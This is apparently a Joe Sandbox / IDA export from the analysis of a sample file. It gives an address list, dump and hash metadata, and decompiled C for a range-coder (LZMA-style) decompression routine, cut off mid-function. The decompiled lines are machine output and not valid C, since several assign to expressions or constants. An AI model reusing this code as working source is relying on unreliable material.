0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a
0x00000000
0x00406ea1

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FBB() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
